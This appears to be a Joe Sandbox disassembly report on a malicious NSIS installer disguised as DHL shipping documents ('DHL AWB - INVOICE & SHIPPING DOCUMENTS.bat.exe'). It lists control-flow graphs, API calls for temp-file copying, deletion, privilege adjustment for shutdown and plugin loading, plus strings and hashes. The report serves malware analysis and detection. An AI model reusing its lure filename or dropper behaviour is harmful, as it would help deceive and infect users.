5338->5310 5339->5316 5339->5324 5339->5325 5339->5331 5342 40432d 22 API calls 5339->5342 5345 40432d 22 API calls 5339->5345 5361 4041f8 DestroyWindow 5339->5361 5340->5343 5344 403f73 5341->5344 5342->5339 5343->5333 5344->5310 5344->5343 5346 4040e4 GetDlgItem 5345->5346 5347 404101 ShowWindow KiUserCallbackDispatcher 5346->5347 5348 4040f9 5346->5348 5370 40434f KiUserCallbackDispatcher 5347->5370 5348->5347 5350 40412b EnableWindow 5355 40413f 5350->5355 5351 404144 GetSystemMenu EnableMenuItem SendMessageA 5352 404174 SendMessageA 5351->5352 5351->5355 5352->5355 5354 403e14 22 API calls 5354->5355 5355->5351 5355->5354 5371 404362 SendMessageA 5355->5371 5372 40628d lstrcpynA 5355->5372 5357 4041a3 lstrlenA 5358 406320 21 API calls 5357->5358 5359 4041b4 SetWindowTextA 5358->5359 5360 401389 2 API calls 5359->5360 5360->5339 5361->5319 5362 404212 CreateDialogParamA 5361->5362 5362->5319 5363 404245 5362->5363 5364 40432d 22 API calls 5363->5364 5365 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5364->5365 5366 401389 2 API calls 5365->5366 5367 404296 5366->5367 5367->5316 5368 40429e ShowWindow 5367->5368 5369 404379 SendMessageA 5368->5369 5369->5319 5370->5350 5371->5355 5372->5357 5373 4025b5 5374 402c9e 21 API calls 5373->5374 5375 4025bf 5374->5375 5376 402c3c 21 API calls 5375->5376 5377 4025c8 5376->5377 5378 4025d6 5377->5378 5383 4027ed 5377->5383 5379 4025e3 RegEnumKeyA 5378->5379 5380 4025ef RegEnumValueA 5378->5380 5381 40260b RegCloseKey 5379->5381 5380->5381 5382 402604 5380->5382 5381->5383 5382->5381 6009 4014b7 6010 4014bd 6009->6010 6011 401389 2 API calls 6010->6011 6012 4014c5 6011->6012 6013 6f7a1000 6014 6f7a101b 5 API calls 6013->6014 6015 6f7a1019 6014->6015 6016 40283b 6038 405e20 GetFileAttributesA CreateFileA 6016->6038 6018 402842 6019 4028fe 6018->6019 6020 4028e6 6018->6020 6021 40285d GlobalAlloc 6018->6021 6022 402905 DeleteFileA 6019->6022 6023 402918 6019->6023 6025 403168 35 API calls 6020->6025 6021->6020 6024 402876 6021->6024 6022->6023 6039 403390 SetFilePointer 6024->6039 6027 4028f3 CloseHandle 6025->6027 6027->6019 6028 40287c 6029 40337a ReadFile 6028->6029 6030 402885 GlobalAlloc 6029->6030 6031 402895 6030->6031 6032 4028cf 6030->6032 6034 403168 35 API calls 6031->6034 6033 405ec7 WriteFile 6032->6033 6035 4028db GlobalFree 6033->6035 6037 4028a2 6034->6037 6035->6020 6036 4028c6 GlobalFree 6036->6032 6037->6036 6038->6018 6039->6028 6040 6f7a1d06 6064 6f7a1b6c 6040->6064 6041 6f7a1d90 GlobalFree GlobalFree GlobalFree 6042 6f7a1dad 6041->6042 6058 6f7a1df7 6041->6058 6043 6f7a2181 6042->6043 6049 6f7a1dc2 6042->6049 6042->6058 6044 6f7a21a3 GetModuleHandleA 6043->6044 6043->6058 6045 6f7a21c9 6044->6045 6046 6f7a21b4 LoadLibraryA 6044->6046 6069 6f7a1652 GetProcAddress 6045->6069 6046->6045 6046->6058 6048 6f7a1c4d GlobalAlloc 6048->6064 6053 6f7a12b4 2 API calls 6049->6053 6049->6058 6050 6f7a221a 6054 6f7a2227 lstrlenA 6050->6054 6050->6058 6051 6f7a1c98 lstrcpyA 6055 6f7a1ca2 lstrcpyA 6051->6055 6052 6f7a1cb6 GlobalFree 6052->6064 6053->6058 6070 6f7a1652 GetProcAddress 6054->6070 6055->6064 6056 6f7a21db 6056->6050 6063 6f7a2204 GetProcAddress 6056->6063 6059 6f7a2047 6068 6f7a12a5 GlobalAlloc 6059->6068 6061 6f7a1f89 GlobalFree 6061->6064 6062 6f7a20c3 6062->6058 6066 6f7a211c lstrcpyA 6062->6066 6063->6050 6064->6041 6064->6048 6064->6051 6064->6052 6064->6055 6064->6058 6064->6059 6064->6061 6064->6062 6065 6f7a12b4 2 API calls 6064->6065 6065->6064 6066->6058 6067 6f7a204f 6068->6067 6069->6056 6070->6058 6071 4047bf 6072 4047eb 6071->6072 6073 4047fc 6071->6073 6132 405987 GetDlgItemTextA 6072->6132 6075 404808 GetDlgItem 6073->6075 6107 404867 6073->6107 6079 40481c 6075->6079 6076 4047f6 6078 406587 5 API calls 6076->6078 6077 40494b 6081 404af5 6077->6081 6134 405987 GetDlgItemTextA 6077->6134 6078->6073 6080 404830 SetWindowTextA 6079->6080 6083 405cb8 4 API calls 6079->6083 6084 40432d 22 API calls 6080->6084 6087 404394 8 API calls 6081->6087 6089 404826 6083->6089 6090 40484c 6084->6090 6085 406320 21 API calls 6091 4048db SHBrowseForFolderA 6085->6091 6086 40497b 6092 405d0d 18 API calls 6086->6092 6088 404b09 6087->6088 6089->6080 6096 405c1f 3 API calls 6089->6096 6093 40432d 22 API calls 6090->6093 6091->6077 6094 4048f3 CoTaskMemFree 6091->6094 6095 404981 6092->6095 6097 40485a 6093->6097 6098 405c1f 3 API calls 6094->6098 6135 40628d lstrcpynA 6095->6135 6096->6080 6133 404362 SendMessageA 6097->6133 6100 404900 6098->6100 6103 404937 SetDlgItemTextA 6100->6103 6108 406320 21 API calls 6100->6108 6102 404860 6105 4066b5 5 API calls 6102->6105 6103->6077 6104 404998 6106 4066b5 5 API calls 6104->6106 6105->6107 6114 40499f 6106->6114 6107->6077 6107->6081 6107->6085 6109 40491f lstrcmpiA 6108->6109 6109->6103 6112 404930 lstrcatA 6109->6112 6110 4049db 6136 40628d lstrcpynA 6110->6136 6112->6103 6113 4049e2 6115 405cb8 4 API calls 6113->6115 6114->6110 6118 405c66 2 API calls 6114->6118 6120 404a33 6114->6120 6116 4049e8 GetDiskFreeSpaceA 6115->6116 6119 404a0c MulDiv 6116->6119 6116->6120 6118->6114 6119->6120 6121 404aa4 6120->6121 6123 404c3b 24 API calls 6120->6123 6122 404ac7 6121->6122 6124 40140b 2 API calls 6121->6124 6137 40434f KiUserCallbackDispatcher 6122->6137 6125 404a91 6123->6125 6124->6122 6127 404aa6 SetDlgItemTextA 6125->6127 6128 404a96 6125->6128 6127->6121 6130 404b76 24 API calls 6128->6130 6129 404ae3 6129->6081 6131 404718 SendMessageA 6129->6131 6130->6121 6131->6081 6132->6076 6133->6102 6134->6086 6135->6104 6136->6113 6137->6129

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 7 403490 5->7 8 40347f-40348e 5->8 9 4034a5-4034e5 6->9 10 40349d 6->10 7->6 8->6 11 4034e7-4034ef call 4066b5 9->11 12 4034f8 9->12 10->9 11->12 18 4034f1 11->18 13 4034fd-403511 call 406647 lstrlenA 12->13 19 403513-40352f call 4066b5 * 3 13->19 18->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 32 403539 27->32 32->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 44 4035d7-4035d8 42->44 45 4035dc-4035df 42->45 50 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->50 51 40370f-403727 DeleteFileA call 402f31 43->51 44->45 47 403670-40367c call 405c4a 45->47 48 4035e5-4035e9 45->48 47->38 67 40367e 47->67 53 403601-40362e 48->53 54 4035eb-4035f1 48->54 50->51 68 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 50->68 69 4037ba-4037cb call 4039bc OleUninitialize 51->69 70 40372d-403733 51->70 56 403640-40366e 53->56 57 403630-403636 53->57 60 4035f3-4035f5 54->60 61 4035f7 54->61 56->47 65 40368b-403698 call 40628d 56->65 63 403638-40363a 57->63 64 40363c 57->64 60->53 60->61 61->53 63->56 63->64 64->56 65->43 67->38 68->51 68->69 82 4037d1-4037e0 call 4059a3 ExitProcess 69->82 83 403928-40392e 69->83 73 403735-403740 call 405c4a 70->73 74 4037ab-4037b2 call 403a96 70->74 87 403742-40376b 73->87 88 403776-40377f 73->88 80 4037b7 74->80 80->69 85 403930-403945 GetCurrentProcess OpenProcessToken 83->85 86 4039a6-4039ae 83->86 94 403976-403984 call 4066b5 85->94 95 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 85->95 92 4039b0 86->92 93 4039b3-4039b6 ExitProcess 86->93 96 40376d-40376f 87->96 90 403781-40378f call 405d0d 88->90 91 4037e6-40380a call 40590e lstrlenA call 40628d 88->91 90->69 106 403791-4037a7 call 40628d * 2 90->106 114 40381b-403830 91->114 115 40380c-403816 call 40628d 91->115 92->93 104 403992-40399d ExitWindowsEx 94->104 105 403986-403990 94->105 95->94 96->88 100 403771-403774 96->100 100->88 100->96 104->86 108 40399f-4039a1 call 40140b 104->108 105->104 105->108 106->74 108->86 118 403835 114->118 115->114 120 403839-403865 wsprintfA call 406320 118->120 123 403867-40386c call 405897 120->123 124 40386e call 4058f1 120->124 128 403873-403875 123->128 124->128 129 403877-403881 GetFileAttributesA 128->129 130 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 128->130 131 4038a0-4038a8 129->131 132 403883-40388c DeleteFileA 129->132 130->69 138 4038d4-4038f5 call 406066 call 406320 call 405926 130->138 131->118 135 4038aa 131->135 132->131 134 40388e-40389e call 405a4f 132->134 134->120 134->131 135->69 146 4038f7-4038ff 138->146 147 403918-403923 CloseHandle 138->147 146->69 148 403905-40390d call 406620 146->148 147->69 148->120 151 403913 148->151 151->69
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                            • GetVersionExA.KERNEL32(?), ref: 00403424
                                            • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                            • #17.COMCTL32(?,?,0000000A,?), ref: 00403541
                                            • OleInitialize.OLE32(00000000), ref: 00403548
                                            • SHGetFileInfoA.SHELL32(00429448,00000000,?,?,00000000,?,?,0000000A,?), ref: 00403566
                                            • GetCommandLineA.KERNEL32(Traveskoens Setup,NSIS Error,?,?,0000000A,?), ref: 0040357B
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",00000020,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",00000000,?,?,0000000A,?), ref: 004035B5
                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,?,0000000A,?), ref: 004036AE
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,0000000A,?), ref: 004036BF
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?), ref: 004036CB
                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?), ref: 004036DF
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?), ref: 004036E7
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?), ref: 004036F8
                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,0000000A,?), ref: 00403700
                                            • DeleteFileA.KERNELBASE(1033,?,?,0000000A,?), ref: 00403714
                                            • OleUninitialize.OLE32(?,?,?,0000000A,?), ref: 004037BF
                                            • ExitProcess.KERNEL32 ref: 004037E0
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",00000000,?,?,?,0000000A,?), ref: 004037EF
                                            • wsprintfA.USER32 ref: 00403846
                                            • GetFileAttributesA.KERNEL32(00431400,C:\Users\user\AppData\Local\Temp\,00431400,?,?), ref: 00403878
                                            • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00431400,?,?), ref: 004038B0
                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,00431400,00000001), ref: 004038C6
                                            • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                            • GetCurrentProcess.KERNEL32(?,?,?,0000000A,?), ref: 00403936
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                            • ExitProcess.KERNEL32 ref: 004039B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                            • String ID: "$"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Traveskoens Setup$UXTHEME$\Temp$`K~v$~nsu%X.tmp
                                            • API String ID: 2956269667-128007746
                                            • Opcode ID: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                            • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                            • Opcode Fuzzy Hash: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                            • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 152 40550f-40552b 153 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 152->153 154 4056ba-4056c0 152->154 176 405616-405619 153->176 177 4055fa-405614 SendMessageA * 2 153->177 156 4056c2-4056e4 GetDlgItem CreateThread FindCloseChangeNotification 154->156 157 4056ea-4056f6 154->157 156->157 159 405718-40571e 157->159 160 4056f8-4056fe 157->160 161 405720-405726 159->161 162 405773-405776 159->162 164 405700-405713 ShowWindow * 2 call 404362 160->164 165 405739-405740 call 404394 160->165 167 405728-405734 call 404306 161->167 168 40574c-40575c ShowWindow 161->168 162->165 171 405778-40577e 162->171 164->159 173 405745-405749 165->173 167->165 174 40576c-40576e call 404306 168->174 175 40575e-405767 call 4053d1 168->175 171->165 178 405780-405793 SendMessageA 171->178 174->162 175->174 179 405629-405640 call 40432d 176->179 180 40561b-405627 SendMessageA 176->180 177->176 181 405890-405892 178->181 182 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 178->182 191 405642-405656 ShowWindow 179->191 192 405676-405697 GetDlgItem SendMessageA 179->192 180->179 181->173 189 4057c7-4057d7 GetWindowRect 182->189 190 4057da-4057f0 TrackPopupMenu 182->190 189->190 190->181 193 4057f6-405810 190->193 194 405665 191->194 195 405658-405663 ShowWindow 191->195 192->181 196 40569d-4056b5 SendMessageA * 2 192->196 197 405815-405830 SendMessageA 193->197 198 40566b-405671 call 404362 194->198 195->198 196->181 197->197 199 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 197->199 198->192 201 405854-405874 SendMessageA 199->201 201->201 202 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 201->202 202->181
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                            • GetClientRect.USER32(?,?), ref: 004055BA
                                            • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                            • ShowWindow.USER32(?,?), ref: 0040565D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                              • Part of subcall function 00404362: SendMessageA.USER32(?,?,00000001,00404192), ref: 00404370
                                            • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004056E4
                                            • ShowWindow.USER32(00000000), ref: 00405707
                                            • ShowWindow.USER32(?,?), ref: 0040570E
                                            • ShowWindow.USER32(?), ref: 00405754
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                            • CreatePopupMenu.USER32 ref: 00405799
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                            • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                            • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004057E7
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                            • OpenClipboard.USER32(00000000), ref: 00405833
                                            • EmptyClipboard.USER32 ref: 00405839
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                            • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                            • CloseClipboard.USER32 ref: 0040588A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                            • String ID:
                                            • API String ID: 4154960007-0
                                            • Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                            • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                            • Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                            • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                            APIs
                                              • Part of subcall function 6F7A12A5: GlobalAlloc.KERNELBASE(?,6F7A12C3,?,6F7A135F,-6F7A504B,6F7A11C0,-000000A0), ref: 6F7A12AD
                                            • GlobalAlloc.KERNELBASE(?,000014A4), ref: 6F7A1C54
                                            • lstrcpyA.KERNEL32(00000008,?), ref: 6F7A1C9C
                                            • lstrcpyA.KERNEL32(00000408,?), ref: 6F7A1CA6
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A1CB9
                                            • GlobalFree.KERNEL32(?), ref: 6F7A1D99
                                            • GlobalFree.KERNEL32(?), ref: 6F7A1D9E
                                            • GlobalFree.KERNEL32(?), ref: 6F7A1DA3
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A1F8A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloclstrcpy
                                            • String ID:
                                            • API String ID: 852173138-0
                                            • Opcode ID: b34a95c89ee2618b5dcece78b04ebd49b172b8a52a56966da60abc37775a9124
                                            • Instruction ID: 9f233c35c2e3b4136e41d53d723892d712a87128da5ff4ee5055ce4ec2264453
                                            • Opcode Fuzzy Hash: b34a95c89ee2618b5dcece78b04ebd49b172b8a52a56966da60abc37775a9124
                                            • Instruction Fuzzy Hash: 35229C71948649DAEB108FB8C6847EEBBF0BF05315F12873AD1A5A6280DBB66541CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 733 405a4f-405a75 call 405d0d 736 405a77-405a89 DeleteFileA 733->736 737 405a8e-405a95 733->737 738 405c18-405c1c 736->738 739 405a97-405a99 737->739 740 405aa8-405ab8 call 40628d 737->740 741 405bc6-405bcb 739->741 742 405a9f-405aa2 739->742 748 405ac7-405ac8 call 405c66 740->748 749 405aba-405ac5 lstrcatA 740->749 741->738 744 405bcd-405bd0 741->744 742->740 742->741 746 405bd2-405bd8 744->746 747 405bda-405be2 call 406620 744->747 746->738 747->738 757 405be4-405bf8 call 405c1f call 405a07 747->757 751 405acd-405ad0 748->751 749->751 754 405ad2-405ad9 751->754 755 405adb-405ae1 lstrcatA 751->755 754->755 756 405ae6-405b04 lstrlenA FindFirstFileA 754->756 755->756 758 405b0a-405b21 call 405c4a 756->758 759 405bbc-405bc0 756->759 772 405c10-405c13 call 4053d1 757->772 773 405bfa-405bfd 757->773 766 405b23-405b27 758->766 767 405b2c-405b2f 758->767 759->741 761 405bc2 759->761 761->741 766->767 769 405b29 766->769 770 405b31-405b36 767->770 771 405b42-405b50 call 40628d 767->771 769->767 775 405b38-405b3a 770->775 776 405b9b-405bad FindNextFileA 770->776 783 405b52-405b5a 771->783 784 405b67-405b72 call 405a07 771->784 772->738 773->746 778 405bff-405c0e call 4053d1 call 406066 773->778 775->771 779 405b3c-405b40 775->779 776->758 781 405bb3-405bb6 FindClose 776->781 778->738 779->771 779->776 781->759 783->776 788 405b5c-405b65 call 405a4f 783->788 793 405b93-405b96 call 4053d1 784->793 794 405b74-405b77 784->794 788->776 793->776 795 405b79-405b89 call 4053d1 call 406066 794->795 796 405b8b-405b91 794->796 795->776 796->776
                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405A78
                                            • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405AC0
                                            • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405AE1
                                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405AE7
                                            • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405AF8
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                            • FindClose.KERNEL32(00000000), ref: 00405BB6
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5C
                                            • \*.*, xrefs: 00405ABA
                                            • "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe", xrefs: 00405A58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-1435122640
                                            • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                            • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                            • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
